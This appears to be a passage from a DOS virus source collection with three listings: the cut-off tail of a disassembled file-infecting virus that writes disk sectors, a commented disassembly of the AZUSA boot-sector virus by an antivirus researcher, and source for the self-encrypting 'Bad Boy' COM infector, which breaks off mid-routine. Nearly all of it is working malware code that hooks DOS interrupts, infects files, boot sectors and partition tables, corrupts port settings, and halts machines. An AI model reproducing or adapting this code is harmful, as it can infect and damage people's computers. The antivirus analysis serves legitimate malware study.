		INT	21H			; DOS Services  ah=function 3Eh
						;  close file, bx=file handle
		RETN
SUB_1		ENDP
  
  
;
;			       SUBROUTINE
;
  
SUB_2		PROC	NEAR
		MOV	DS,CX
		MOV	BL,DS:DATA_1E		; (0000:046C=34H)
		PUSH	CS
		POP	DS
		INC	DATA_7			; (65AC:045E=0FC00H)
		MOV	DX,64BH
		CALL	SUB_3			; (036D)
		MOV	SI,60AH
		MOV	BYTE PTR [SI],5CH	; '\'
		INC	SI
		XOR	DL,DL			; Zero register
		MOV	AH,47H			; 'G'
		INT	21H			; DOS Services  ah=function 47h
						;  get present dir,drive dl,1=a:
		MOV	DX,39BH
LOC_13:
		MOV	AH,3BH			; ';'
		INT	21H			; DOS Services  ah=function 3Bh
						;  set current dir, path @ ds:dx
		JCXZ	LOC_14			; Jump if cx=0
		MOV	AH,51H			; 'Q'
		INT	21H			; DOS Services  ah=function 51h
						;  get active PSP segment in bx
		MOV	DS,BX
		MOV	DX,80H
  
; External Entry into Subroutine 
  
SUB_3:
		MOV	AH,1AH
		JMP	SHORT LOC_12		; (0339)
LOC_14:
		JC	LOC_17			; Jump if carry Set
		MOV	SI,39CH
		XOR	DL,DL			; Zero register
		MOV	AH,47H			; 'G'
		INT	21H			; DOS Services  ah=function 47h
						;  get present dir,drive dl,1=a:
		CMP	CH,BYTE PTR DS:[3DCH]	; (65AC:03DC=81H)
LOC_15:
		MOV	CL,32H			; '2'
		MOV	DX,29DH
		MOV	AH,4EH			; 'N'
		JZ	LOC_20			; Jump if zero
		INT	21H			; DOS Services  ah=function 4Eh
						;  find 1st filenam match @ds:dx
		JC	LOC_17			; Jump if carry Set
LOC_16:
		MOV	DX,64BH
		MOV	AX,4F01H
		MOV	SI,3DCH
		MOV	DI,668H
		STOSB				; Store al to es:[di]
		MOV	CL,0DH
		REPE	CMPSB			; Rep zf=1+cx >0 Cmp [si] to es:[di]
		JZ	LOC_20			; Jump if zero
		CMP	CH,[DI-2]
		JE	LOC_20			; Jump if equal
		INT	21H			; DOS Services  ah=function 4Fh
						;  find next filename match
		JNC	LOC_16			; Jump if carry=0
		XOR	AL,AL			; Zero register
		JMP	SHORT LOC_15		; (0380)
		DB	2AH, 2EH, 2AH, 0
LOC_17:
		MOV	CL,41H			; 'A'
		MOV	DI,39CH
		CMP	CH,[DI]
		MOV	AL,CH
		MOV	BYTE PTR DS:[3DCH],AL	; (65AC:03DC=81H)
		JZ	LOC_23			; Jump if zero
		REPNE	SCASB			; Rep zf=0+cx >0 Scan es:[di] for al
		DEC	DI
		MOV	CL,41H			; 'A'
		MOV	AL,5CH			; '\'
		STD				; Set direction flag
		REPNE	SCASB			; Rep zf=0+cx >0 Scan es:[di] for al
		LEA	SI,[DI+2]		; Load effective addr
		MOV	DI,3DCH
		CLD				; Clear direction
LOC_18:
		LODSB				; String [si] to al
		TEST	AL,AL
		STOSB				; Store al to es:[di]
		JNZ	LOC_18			; Jump if not zero
		MOV	DX,2CDH
		XOR	CL,CL			; Zero register
		JMP	SHORT LOC_13		; (035E)
		DB	2EH, 2EH, 0
LOC_19:
		MOV	DX,64BH
		MOV	AH,4FH			; 'O'
LOC_20:
		INT	21H			; DOS Services  ah=function 4Fh
						;  find next filename match
		JC	LOC_17			; Jump if carry Set
DATA_6		DW	69BEH
		DB	6, 0BFH, 0DCH, 3, 80H, 3CH
		DB	2EH, 74H, 0ECH, 88H, 2DH, 8BH
		DB	0D6H, 0F6H, 44H, 0F7H, 10H, 75H
		DB	0DBH
LOC_21:
		LODSB				; String [si] to al
		TEST	AL,AL
		STOSB				; Store al to es:[di]
		JNZ	LOC_21			; Jump if not zero
		DEC	SI
		STD				; Set direction flag
		LODSW				; String [si] to ax
		LODSW				; String [si] to ax
		CLD				; Clear direction
		CMP	AX,4558H
		JE	LOC_22			; Jump if equal
		CMP	AX,4D4FH
		JNE	LOC_19			; Jump if not equal
LOC_22:
		PUSH	BX
		CALL	SUB_1			; (0262)
		POP	BX
		XOR	CX,CX			; Zero register
		MOV	ES,CX
		MOV	AL,ES:DATA_1E		; (0000:046C=38H)
		PUSH	CS
		POP	ES
		SUB	AL,BL
		CMP	AL,BH
		JB	LOC_19			; Jump if below
LOC_23:
		MOV	DX,80H
		MOV	CL,3
		MOV	BX,200H
		MOV	AX,301H
		INT	13H			; Disk  dl=drive 0: ah=func 03h
						;  write sectors from mem es:bx
		MOV	DX,60AH
		JMP	LOC_13			; (035E)
SUB_2		ENDP
  
LOC_24:
		XCHG	AX,BP
		MOV	DI,100H
		MOV	BX,[DI+1]
		SUB	BX,228H
		MOV	AX,DI
		LEA	SI,[BX+3FDH]		; Load effective addr
		MOVSW				; Mov [si] to es:[di]
		MOVSB				; Mov [si] to es:[di]
		XCHG	AX,BX
		MOV	CL,4
		SHR	AX,CL			; Shift w/zeros fill
		MOV	CX,DS
		ADD	AX,CX
		MOV	DX,0BH
		JMP	SHORT LOC_26		; (04CD)
		DB	0B8H, 0D0H
DATA_7		DW	0FC00H
DATA_8		DW	8587H
		DB	68H, 0FAH, 0ABH, 8CH, 0C8H, 0E2H
		DB	0F7H, 0A3H, 86H, 0, 0ABH, 8EH
		DB	0D8H, 0B4H, 8, 0CDH, 13H, 49H
		DB	49H, 0A1H, 0E9H, 3, 84H, 0E4H
		DB	74H, 1, 91H, 0B2H, 80H, 0B8H
		DB	3, 3, 0CDH, 13H, 91H, 84H
		DB	0E4H, 75H, 2
		DB	2CH, 40H
LOC_25:
		DEC	AH
		MOV	DATA_6,AX		; (65AC:03E9=69BEH)
		INC	DATA_8			; (65AC:0460=8587H)
		XOR	DH,DH			; Zero register
		MOV	CX,1
		MOV	BX,400H
		MOV	AX,301H
		INT	13H			; Disk  dl=drive ?: ah=func 03h
						;  write sectors from mem es:bx
		MOV	DL,DH
		RETF				; Return far
		DB	41H, 4EH, 54H, 48H, 52H, 41H
		DB	58H, 0EH, 1FH, 83H, 2EH, 13H
		DB	4, 2, 0CDH, 12H, 0B1H, 6
		DB	0D3H, 0E0H, 8EH, 0C0H, 0BFH, 0
		DB	4, 0BEH, 0, 7CH, 0B9H, 0
		DB	1, 8BH, 0DEH, 0FCH, 0F3H, 0A5H
		DB	8EH, 0D8H, 0BAH, 27H, 4
LOC_26:
		PUSH	CX
		PUSH	BX
		PUSH	AX
		PUSH	DX
		RETF				; Return far
		DB	8EH, 0C1H, 0B1H, 4, 0BEH, 0B0H
		DB	5
  
LOCLOOP_27:
		ADD	SI,0EH
		LODSW				; String [si] to ax
		CMP	AL,80H
		JE	LOC_29			; Jump if equal
		LOOP	LOCLOOP_27		; Loop if cx > 0

LOC_28:
		INT	18H			; ROM basic
LOC_29:
		XCHG	AX,DX
		STD				; Set direction flag
		LODSW				; String [si] to ax
		XCHG	AX,CX
		MOV	AX,201H
		INT	13H			; Disk  dl=drive a: ah=func 02h
						;  read sectors to memory es:bx
		CMP	WORD PTR DS:DATA_10E,0AA55H	; (65AC:05FE=0)
		JNE	LOC_28			; Jump if not equal
		PUSH	ES
		PUSH	DS
		POP	ES
		POP	DS
		XOR	DH,DH			; Zero register
		MOV	CX,2
		XOR	BX,BX			; Zero register
		MOV	AX,202H
		INT	13H			; Disk  dl=drive a: ah=func 02h
						;  read sectors to memory es:bx
		JMP	$-10FH
		DB	0, 0, 0, 0, 0CDH, 20H
		DB	0CCH
		DB	112 DUP (1AH)
  
SEG_A		ENDS
  
  
  
		END	START

.............................................................................



; 	AZUSA virus
;
;	Discovered an commented by  Ferenc Leitold
; 			      Hungarian VirusBuster Team
;                              Address: 1399 Budapest
;                                       P.O. box 701/349
;                                          HUNGARY



217D:0100  E98B00         JMP    018E		; Jump to main entry point
217D:0103  50             PUSH   AX
217D:0104  43             INC    BX
217D:0105  20546F         AND    [SI+6F],DL
217D:0108  6F             OUTSW
217D:0109  6C             INSB
217D:010A  73

						; INT13 entry point
217D:010B  F6C402         TEST	 AH,02
217D:010E  745B           JZ     016B
217D:0110  F6C280         TEST   DL,80
217D:0113  7556           JNZ    016B 		; Jump, if hard disk
217D:0115  50             PUSH   AX
217D:0116  1E             PUSH   DS
217D:0117  31C0           XOR    AX,AX
217D:0119  8ED8           MOV    DS,AX
217D:011B  88D0           MOV    AL,DL
217D:011D  FEC0           INC    AL
217D:011F  84063F04       TEST   [043F],AL	; test diskette is work
217D:0123  7544           JNZ    0169

217D:0125  53             PUSH   BX		; Save registers
217D:0126  51             PUSH   CX
217D:0127  52             PUSH   DX
217D:0128  06             PUSH   ES
217D:0129  57             PUSH   DI
217D:012A  56             PUSH   SI

217D:012B  B80102         MOV    AX,0201	; Load boot sector of disk
217D:012E  0E             PUSH   CS
217D:012F  07             POP    ES
217D:0130  BB0002         MOV    BX,0200
217D:0133  B90100         MOV    CX,0001
217D:0136  B600           MOV    DH,00
217D:0138  E83500         CALL   0170
217D:013B  7226           JC     0163		; jump, if error

217D:013D  0E             PUSH   CS
217D:013E  1F             POP    DS
217D:013F  A18902         MOV    AX,[0289]	; Check if infected yet ?
217D:0142  3B068900       CMP    AX,[0089]
217D:0146  741B           JZ     0163		; Jump, if infected

217D:0148  B80103         MOV    AX,0301	; Write orig. boot sector
217D:014B  B90827         MOV    CX,2708	; cyl.: 39   sect.: 8
217D:014E  B601           MOV    DH,01          ; head: 1
217D:0150  E81D00         CALL   0170           ;  Call INT13 (write)
217D:0153  720E           JC     0163
217D:0155  E81F00         CALL   0177		; Copy parameters
217D:0158  B80103         MOV    AX,0301	; Write virus body
217D:015B  31DB           XOR    BX,BX
217D:015D  41             INC    CX             ; CX will 1 (CALL 0177)
217D:015E  B600           MOV    DH,00          ; head: 0
217D:0160  E80D00         CALL   0170           ;  Call INT13 (write)

217D:0163  5E             POP    SI		; Restore registers
217D:0164  5F             POP    DI
217D:0165  07             POP    ES
217D:0166  5A             POP    DX
217D:0167  59             POP    CX
217D:0168  5B             POP    BX

217D:0169  1F             POP    DS
217D:016A  58             POP    AX

217D:016B  EAEBA100F0     JMP    F000:A1EB	; Jump to orig. INT13

217D:0170  9C             PUSHF			; Call orig. INT13
217D:0171  2EFF1E6C00     CALL   Far CS:[006C]
217D:0176  C3             RET

217D:0177  BE0302         MOV    SI,0203	; Copy diskette par. area
217D:017A  BF0300         MOV    DI,0003
217D:017D  B90800         MOV    CX,0008
217D:0180  FC             CLD
217D:0181  F3A4           REP    MOVSB

217D:0183  BE7003         MOV    SI,0370        ; Copy parttition info.
217D:0186  BF7001         MOV    DI,0170
217D:0189  B190           MOV    CL,90
217D:018B  F3A4           REP    MOVSB
217D:018D  C3             RET


;*************************** Main entry point *************************

217D:018E  31C0           XOR    AX,AX		; Set STACK and DS
217D:0190  8ED8           MOV    DS,AX
217D:0192  8ED0           MOV    SS,AX
217D:0194  BC007C         MOV    SP,7C00

217D:0197  A14C00         MOV    AX,[004C]	; Save INT13 vector
217D:019A  A36C7C         MOV    [7C6C],AX
217D:019D  A14E00         MOV    AX,[004E]
217D:01A0  A36E7C         MOV    [7C6E],AX

217D:01A3  A11304         MOV    AX,[0413]	; Decrease memory by 1KB
217D:01A6  48             DEC    AX
217D:01A7  A31304         MOV    [0413],AX

217D:01AA  B106           MOV    CL,06		; Calculate segment at TOP
217D:01AC  D3E0           SHL    AX,CL
217D:01AE  8EC0           MOV    ES,AX

217D:01B0  C7064C000B00   MOV    [004C],000B	; Set new INT13 vector
217D:01B6  A34E00         MOV    [004E],AX

217D:01B9  B90002         MOV    CX,0200	; Copy itself to TOP
217D:01BC  BE007C         MOV    SI,7C00
217D:01BF  31FF           XOR    DI,DI
217D:01C1  FC             CLD
217D:01C2  F3A4           REP    MOVSB

217D:01C4  50             PUSH   AX		; Jump to TOP
217D:01C5  B8CA00         MOV    AX,00CA
217D:01C8  50             PUSH   AX
217D:01C9  CB             RET    Far


 TOP:01CA  31C0           XOR    AX,AX		; Reset drive
 TOP:01CC  CD13           INT    13

 TOP:01CE  31C0           XOR    AX,AX
 TOP:01D0  8EC0           MOV    ES,AX
 TOP:01D2  B80102         MOV    AX,0201
 TOP:01D5  BB007C         MOV    BX,7C00
 TOP:01D8  0E             PUSH   CS
 TOP:01D9  1F             POP    DS
 TOP:01DA  E83F00         CALL   021C		; Set CX & DX as the info
						;  of boot partition
 TOP:01DD  F6C1FF         TEST   CL,FF		; Check if it is floppy
 TOP:01E0  7408           JZ     01EA		; Jump, if it is
 TOP:01E2  E85100         CALL   0236
 TOP:01E5  EA007C0000     JMP    0000:7C00	; Jump to boot


						; If floppy disk
 TOP:01EA  B90827         MOV    CX,2708	; load original boot
 TOP:01ED  BA0001         MOV    DX,0100
 TOP:01F0  CD13           INT    13
 TOP:01F2  72F1           JC     01E5		; jump, if error

 TOP:01F4  0E             PUSH   CS
 TOP:01F5  07             POP    ES

 TOP:01F6  B80102         MOV    AX,0201	; Load partition table of
 TOP:01F9  BB0002         MOV    BX,0200	; hard disk
 TOP:01FC  B90100         MOV    CX,0001
 TOP:01FF  BA8000         MOV    DX,0080
 TOP:0202  CD13           INT    13
 TOP:0204  72DF           JC     01E5

 TOP:0206  A18902         MOV    AX,[0289]	; Check, if infected yet ?
 TOP:0209  39068900       CMP    [0089],AX
 TOP:020D  74D6           JZ     01E5		; jump to boot, if it is

 TOP:020F  E865FF         CALL   0177		; Copy parameter area
 TOP:0212  B80103         MOV    AX,0301	; Save virus as part. table
 TOP:0215  31DB           XOR    BX,BX
 TOP:0217  41             INC    CX
 TOP:0218  CD13           INT    13
 TOP:021A  EBC9           JMP    01E5

 TOP:021C  BEBE01         MOV    SI,01BE	; Find boot partition
 TOP:021F  B90400         MOV    CX,0004	;  in partition table
 TOP:0222  803C80         CMP    [SI],80
 TOP:0225  7407           JZ     022E
 TOP:0227  83C610         ADD    SI,0010
 TOP:022A  E2F6           LOOP   0222
 TOP:022C  EB07           JMP    0235		; If not found set CL=FF
 TOP:022E  8B4C02         MOV    CX,[SI+02]	; If found, load it
 TOP:0231  8B14           MOV    DX,[SI]
 TOP:0233  CD13           INT    13
 TOP:0235  C3             RET

 TOP:0236  F6066F01E0     TEST   [016F],E0	; Test counter
 TOP:023B  7515           JNZ    0252
 TOP:023D  80066F0101     ADD    [016F],01	; increase counter
 TOP:0242  B80103         MOV    AX,0301	; save virus body
 TOP:0245  0E             PUSH   CS		;  with increased counter
 TOP:0246  07             POP    ES
 TOP:0247  31DB           XOR    BX,BX
 TOP:0249  B90100         MOV    CX,0001
 TOP:024C  B600           MOV    DH,00
 TOP:024E  CD13           INT    13
 TOP:0250  EB0E           JMP    0260

 TOP:0252  31C0           XOR    AX,AX
 TOP:0254  8ED8           MOV    DS,AX
 TOP:0256  C606080400     MOV    [0408],00	; Corrupt LPT1 port
 TOP:025B  C606000400     MOV    [0400],00	; Coruupt COM1 port
 TOP:0260  0E             PUSH   CS
 TOP:0261  1F             POP    DS
 TOP:0262  C6066F0100     MOV    [016F],00	; Reset counter (in memory)
 TOP:0267  C6065A0100     MOV    [015A],00	; Zero LPT1 port corrupt par.
 TOP:026C  C3             RET

 TOP:026D  0000           ADD    [BX+SI],AL

 TOP:026F  00		  db	0		; counter

 TOP:0270  000000
 TOP:0273  0000           ADD    [BX+SI],AL
 TOP:0275  0000           ADD    [BX+SI],AL
 TOP:0277  0000           ADD    [BX+SI],AL
 TOP:0279  0000           ADD    [BX+SI],AL
 TOP:027B  0000           ADD    [BX+SI],AL
 TOP:027D  0000           ADD    [BX+SI],AL
 TOP:027F  0000           ADD    [BX+SI],AL
 TOP:0281  0000           ADD    [BX+SI],AL
 TOP:0283  0000           ADD    [BX+SI],AL
 TOP:0285  0000           ADD    [BX+SI],AL
 TOP:0287  0000           ADD    [BX+SI],AL
 TOP:0289  0000           ADD    [BX+SI],AL
 TOP:028B  0000           ADD    [BX+SI],AL
 TOP:028D  0000           ADD    [BX+SI],AL
 TOP:028F  0000           ADD    [BX+SI],AL
 TOP:0291  0000           ADD    [BX+SI],AL
 TOP:0293  0000           ADD    [BX+SI],AL
 TOP:0295  0000           ADD    [BX+SI],AL
 TOP:0297  0000           ADD    [BX+SI],AL
 TOP:0299  0000           ADD    [BX+SI],AL
 TOP:029B  0000           ADD    [BX+SI],AL
 TOP:029D  0000           ADD    [BX+SI],AL
 TOP:029F  0000           ADD    [BX+SI],AL
 TOP:02A1  0000           ADD    [BX+SI],AL
 TOP:02A3  0000           ADD    [BX+SI],AL
 TOP:02A5  0000           ADD    [BX+SI],AL
 TOP:02A7  0000           ADD    [BX+SI],AL
 TOP:02A9  0000           ADD    [BX+SI],AL
 TOP:02AB  0000           ADD    [BX+SI],AL
 TOP:02AD  0000           ADD    [BX+SI],AL
 TOP:02AF  0000           ADD    [BX+SI],AL
 TOP:02B1  0000           ADD    [BX+SI],AL
 TOP:02B3  0000           ADD    [BX+SI],AL
 TOP:02B5  0000           ADD    [BX+SI],AL
 TOP:02B7  0000           ADD    [BX+SI],AL
 TOP:02B9  0000           ADD    [BX+SI],AL
 TOP:02BB  0000           ADD    [BX+SI],AL
 TOP:02BD  0000           ADD    [BX+SI],AL
 TOP:02BF  0000           ADD    [BX+SI],AL
 TOP:02C1  0000           ADD    [BX+SI],AL
 TOP:02C3  0000           ADD    [BX+SI],AL
 TOP:02C5  0000           ADD    [BX+SI],AL
 TOP:02C7  0000           ADD    [BX+SI],AL
 TOP:02C9  0000           ADD    [BX+SI],AL
 TOP:02CB  0000           ADD    [BX+SI],AL
 TOP:02CD  0000           ADD    [BX+SI],AL
 TOP:02CF  0000           ADD    [BX+SI],AL
 TOP:02D1  0000           ADD    [BX+SI],AL
 TOP:02D3  0000           ADD    [BX+SI],AL
 TOP:02D5  0000           ADD    [BX+SI],AL
 TOP:02D7  0000           ADD    [BX+SI],AL
 TOP:02D9  0000           ADD    [BX+SI],AL
 TOP:02DB  0000           ADD    [BX+SI],AL
 TOP:02DD  0000           ADD    [BX+SI],AL
 TOP:02DF  0000           ADD    [BX+SI],AL
 TOP:02E1  0000           ADD    [BX+SI],AL
 TOP:02E3  0000           ADD    [BX+SI],AL
 TOP:02E5  0000           ADD    [BX+SI],AL
 TOP:02E7  0000           ADD    [BX+SI],AL
 TOP:02E9  0000           ADD    [BX+SI],AL
 TOP:02EB  0000           ADD    [BX+SI],AL
 TOP:02ED  0000           ADD    [BX+SI],AL
 TOP:02EF  0000           ADD    [BX+SI],AL
 TOP:02F1  0000           ADD    [BX+SI],AL
 TOP:02F3  0000           ADD    [BX+SI],AL
 TOP:02F5  0000           ADD    [BX+SI],AL
 TOP:02F7  0000           ADD    [BX+SI],AL
 TOP:02F9  0000           ADD    [BX+SI],AL
 TOP:02FB  0000           ADD    [BX+SI],AL
 TOP:02FD  0055AA         ADD    [DI-56],DL
.............................................................................



code	      segment
	      assume cs:code,ds:code
	      .radix 16
	      org  100
start:
	      push word ptr cs:[table+2]
	      push cs
	      pop  ds
	      jmp  word ptr cs:[table]	  ;go to module 1

curofs	      dw   ?
files	      db   0		       ;number of infected files from this copy
fsize	      dw   2		       ;size of infected file
ftime	      dw     ?
fdate	      dw     ?
stdint21      dd     ?
oldint13      dd     ?
oldint21      dd     ?
oldint24      dd     ?

;------------- TABLE WITH MODULE PARAMETERS --------------------
table:
	      dw   offset false_mod_1 ;00
	      dw   offset mod_2       ;02
	      dw   offset mod_3       ;04
	      dw   offset mod_4       ;06	       ;offset modules
	      dw   offset mod_5       ;08
	      dw   offset mod_6       ;0a
	      dw   offset mod_7       ;0c
	      dw   offset mod_8       ;0e

	      dw   offset mod_2 - offset mod_1;10
	      dw   offset mod_3 - offset mod_2;12
	      dw   offset mod_4 - offset mod_3;14
	      dw   offset mod_5 - offset mod_4;16
	      dw   offset mod_6 - offset mod_5;18	;size modules
	      dw   offset mod_7 - offset mod_6;1a
	      dw   offset mod_8 - offset mod_7;1c
	      dw   offset myend - offset mod_8;1e


;------------- MODULE - 1 - CODER/DECODER ----------------------
mod_1:
	      mov  bx,offset table+2   ;first module to working (module 2)
	      mov  cx,6 	       ;number of modules to working
mod_1_lp1:
	      cmp  bx,offset table+0a
	      jne  mod_1_cont
	      add  bx,2
mod_1_cont:
	      push bx
	      push cx
	      mov  ax,[bx]	       ;ax - offset module
	      mov  cx,[bx+10]	       ;cx - size of module
	      mov  bx,ax
mod_1_lp2:
	      xor  byte ptr [bx],al
	      inc  bx
	      loop mod_1_lp2
	      pop  cx
	      pop  bx
	      add  bx,2
	      loop mod_1_lp1
	      ret

;------------- MODULE - 2 - MUTATION TO MEMORY -----------------
mod_2:
		     ;instalation check

	      mov    es,cs:[2]				   ;memory size
	      mov    di,100
	      mov    si,100
	      mov    cx,0bh
	      repe   cmpsb
	      jne    mod_2_install			   ;jump if not install
	      jmp    word ptr cs:[table+06]  ;if install, jump to module 4

mod_2_install:
		     ;instalation

	      mov    ax,cs
	      dec    ax
	      mov    ds,ax

	      cmp    byte ptr ds:[0],'Z'
	      je     mod_2_cont

	      jmp    word ptr cs:[table+6]	    ;if no last MCB - go to mod4

mod_2_cont:
	      sub    word ptr ds:[3],0c0
	      mov    ax,es
	      sub    ax,0c0
	      mov    es,ax
	      mov    word ptr ds:[12],ax       ;decrement memory size with 2K
	      push   cs
	      pop    ds

mod_2_mut:
	      mov  byte ptr cs:files,0

	      mov  di,100
	      mov  cx,offset mod_1-100
	      mov  si,100
	      rep  movsb     ;write table to new memory

	      mov  bx,word ptr cs:[table]
	      add  bx,offset mod_1_lp2-offset mod_1+1
	      xor  byte ptr [bx],18			   ;change code method

	      mov  cx,8
	      mov  word ptr curofs,offset mod_1
mod_2_lp1:
	      push cx
	      call mod_2_rnd ;generate random module addres
	      push bx	     ;addres in table returned from mod_2_rnd
	      mov  ax,[bx]   ;offset module
	      push ax
	      add  bx,10
	      mov  cx,[bx]   ;length of module
	      pop  si
	      pop  bx
	      xchg di,curofs
	      mov  word ptr es:[bx],di ;change module offset in table
	      rep  movsb	       ;copy module to new memory
	      xchg di,curofs	       ;change current offset in new memory
	      mov  ax,8000
	      or   word ptr [bx],ax    ;mark module - used
	      pop  cx
	      loop mod_2_lp1
	      mov  cl,8
	      not  ax
	      mov  bx,offset table
mod_2_lp2:
	      and  word ptr [bx],ax    ;unmark all modules
	      add  bx,2
	      loop mod_2_lp2

	      jmp  word ptr cs:[table+4]  ;go to module 3

mod_2_rnd:
	      push cx
	      push es
	      xor  cx,cx
	      mov  es,cx
mod_2_lp3:
	      mov  bx,es:[46c]
	      db 81,0e3,07,00  ;and bx,7
	      shl  bx,1
	      add  bx,offset table
	      test [bx],8000
	      jnz  mod_2_lp3
	      pop  es
	      pop  cx
	      ret

;------------- MODULE - 3 - SET INTERRUPT VECTORS ---------------
mod_3:
	      xor    ax,ax
	      mov    ds,ax

	      mov    ax,ds:[4*21]
	      mov    word ptr es:[oldint21],ax
	      mov    ax,ds:[4*21+2]
	      mov    word ptr es:[oldint21+2],ax

	      mov    ah,30
	      int    21
	      cmp    ax,1e03
	      jne    mod_3_getvec

	      mov    word ptr es:[stdint21],1460
	      mov    ax,1203
	      push   ds
	      int    2f
	      mov    word ptr es:[stdint21+2],ds
	      pop    ds
	      jmp    mod_3_setvec

mod_3_getvec:
	      mov    ax,ds:[4*21]
	      mov    word ptr es:[stdint21],ax
	      mov    ax,ds:[4*21+2]
	      mov    word ptr es:[stdint21+2],ax

mod_3_setvec:
	      cli
	      mov    ax,word ptr es:[table+0c]
	      mov    ds:[4*21],ax
	      mov    ax,es
	      mov    ds:[4*21+2],ax
	      sti

	      mov    cx,es
	      mov    ah,13			 ;
	      int    2f 			 ;
	      push   es 			 ;
	      mov    es,cx			 ;
	      mov    word ptr es:[oldint13],dx	 ; get standart int13 addres
	      mov    word ptr es:[oldint13+2],ds ;
	      pop    es 			 ;
	      int    2f 			 ;

	      jmp    word ptr cs:[table+06]		      ;go to module 4

;------------- MODULE - 4 - RESTORE OLD PROGRAM CODE & START ----
mod_4:
	      push   cs
	      push   cs
	      pop    ds
	      pop    es
	      mov    si,word ptr cs:[table+06]
	      add    si,offset mod_4_cont - offset mod_4
	      mov    di,cs:fsize
	      add    di,offset myend+1
	      push   di
	      mov    cx,offset mod_5 - offset mod_4_cont
	      cld
	      rep    movsb
	      ret
mod_4_cont:
	      mov    si,cs:fsize
	      add    si,100

	      cmp    si,offset myend+1
	      jnc    mod_4_cnt
	      mov    si,offset myend+1
mod_4_cnt:
	      mov    di,100
	      mov    cx,offset myend-100
	      rep    movsb
	      mov    ax,100   ;
	      push   ax       ; jmp 100
	      ret	      ;

;------------- MODULE - 5 - SPECIAL PROGRAM ---------------------
mod_5:
	      mov    ah,9
	      mov    dx,word ptr [table+8]
	      add    dx,offset msg-offset mod_5
	      push   cs
	      pop    ds
	      int    21
	      cli
	      hlt

msg	      db     0dh,0a,'The bad boy halt your system ...',7,7,'$'

;------------- MODULE - 6 - INT 24 HEADER -----------------------
mod_6:
	      mov    al,3
	      iret
	      db     'The Bad Boy virus, Copyright (C) 1991.',0

;------------- MODULE - 7 - INT 21 HEADER -----------------------
mod_7:
	      push   bx
	      push   si
	      push   di
	      push   es
	      push   ax

	      cmp    ax,4b00
	      je     mod_7_begin
	      jmp    mod_7_exit
mod_7_begin:
	      push   ds
	      push   cs 			       ;
	      pop    es 			       ;
	      xor    ax,ax			       ;
	      mov    ds,ax			       ;
	      mov    si,4*24			       ;
	      mov    di,offset oldint24 	       ;
	      movsw				       ;   change int24 vector
	      movsw				       ;
	      mov    ax,word ptr cs:[table+0a]	       ;
	      cli				       ;
	      mov    ds:[4*24],ax		       ;
	      mov    ax,cs			       ;
	      mov    ds:[4*24+2],ax		       ;
	      sti
	      pop    ds

	      mov    ax,3d00			       ;
	      pushf				       ;
	      call   cs:oldint21		       ;
	      jc     mod_7_ex			       ; open,infect,close file
	      mov    bx,ax			       ;
mod_7_infect:					       ;
	      call   word ptr cs:[table+0e]	       ;
	      pushf
	      mov    ah,3e			       ;
	      pushf				       ;
	      call   cs:oldint21		       ;
	      popf
	      jc     mod_7_ex

	      push   ds 			 ;
	      cli				 ;
	      xor    ax,ax			 ;
	      mov    ds,ax			 ;
	      mov    ax,word ptr cs:[oldint13]	 ;
	      xchg   ax,word ptr ds:[4*13]	 ;
	      mov    word ptr cs:[oldint13],ax	 ; exchange int13 vectors
	      mov    ax,word ptr cs:[oldint13+2] ;
	      xchg   ax,word ptr ds:[4*13+2]	 ;
	      mov    word ptr cs:[oldint13+2],ax ;
	      sti				 ;
	      pop    ds 			 ;
mod_7_ex:
	      push   ds 			       ;
	      xor    ax,ax			       ;
	      mov    ds,ax			       ;
	      mov    ax,word ptr cs:oldint24	       ;
	      mov    ds:[4*24],ax		       ;
	      mov    ax,word ptr cs:oldint24+2	       ; restore int24 vector
	      mov    ds:[4*24+2],ax		       ;
	      pop    ds 			       ;

mod_7_exit:
	      pop    ax
	      pop    es
	      pop    di
	      pop    si
	      pop    bx

	      jmp    cs:oldint21

;------------- MODULE - 8 - INFECTING (bx - file handle) --------
mod_8:
	      push   cx
	      push   dx
	      push   ds
	      push   es
	      push   di
	      push   bp

	      push   bx
	      mov    ax,1220
	      int    2f
	      mov    bl,es:[di]
	      xor    bh,bh
	      mov    ax,1216
	      int    2f
	      pop    bx

	      mov    ax,word ptr es:[di+11]
	      cmp    ax,0f000
	      jc     mod_8_c
	      jmp    mod_8_exit

mod_8_c:
	      mov    word ptr es:[di+2],2		   ;open mode - R/W

	      mov    ax,es:[di+11]
	      mov    cs:fsize,ax	       ; save file size

	      mov    ax,word ptr es:[di+0dh]   ;
	      mov    word ptr cs:[ftime],ax    ; save file date/time
	      mov    ax,word ptr es:[di+0f]    ;
	      mov    word ptr cs:[fdate],ax    ;

	      push   cs 			 ;
	      pop    ds 			 ;
	      mov    dx,offset myend+1		 ;
	      mov    cx,offset myend-100	 ; read first bytes
	      mov    ah,3f			 ;
	      pushf
	      call   cs:oldint21
	      jnc    mod_8_cnt
	      jmp    mod_8_exit

mod_8_cnt:
	      mov    bp,ax			 ; ax - bytes read
	      mov    si,dx
	      mov    ax,'MZ'
	      cmp    ax,word ptr ds:[si]
	      jne    mod_8_nxtchk
	      jmp    mod_8_exit
mod_8_nxtchk:
	      xchg   ah,al
	      cmp    ax,ds:[si]
	      jne    mod_8_cnt2
	      jmp    mod_8_exit

mod_8_cnt2:
	      push   es
	      push   di
	      push   cs 			 ;
	      pop    es 			 ;
	      mov    si,100			 ;
	      mov    di,dx			 ; check for infected file
	      mov    cx,0bh			 ;
	      repe   cmpsb			 ;
	      pop    di
	      pop    es
	      jne    mod_8_cnt1 		 ;
	      jmp    mod_8_exit
mod_8_cnt1:
	      mov    word ptr es:[di+15],0     ; fp:=0

	      push   es
	      push   di
	      mov    si,word ptr cs:[table+0e]
	      add    si,offset mod_8_cont - offset mod_8
	      xor    di,di
	      push   cs
	      pop    es
	      mov    cx,offset mod_8_cont_end - offset mod_8_cont
	      cld
	      rep    movsb
	      pop    di
	      pop    es

	      mov    si,word ptr cs:[table+0e]
	      add    si,offset mod_8_cont_end - offset mod_8
	      push   si
	      xor    si,si
	      push   si

	      push   ds 			 ;
	      cli				 ;
	      xor    ax,ax			 ;
	      mov    ds,ax			 ;
	      mov    ax,word ptr cs:[oldint13]	 ;
	      xchg   ax,word ptr ds:[4*13]	 ;
	      mov    word ptr cs:[oldint13],ax	 ;
	      mov    ax,word ptr cs:[oldint13+2] ; exchange int13 vectors
	      xchg   ax,word ptr ds:[4*13+2]	 ;
	      mov    word ptr cs:[oldint13+2],ax ;
	      sti				 ;
	      pop    ds 			 ;

	      ret

mod_8_cont:
	      push   bx
	      call   word ptr cs:[table]	 ; code virus
	      pop    bx

	      mov    dx,100			 ;
	      mov    ah,40			 ; write code in begin
	      mov    cx,offset myend-0ff
	      pushf				 ;
	      call   cs:stdint21		 ;

	      pushf
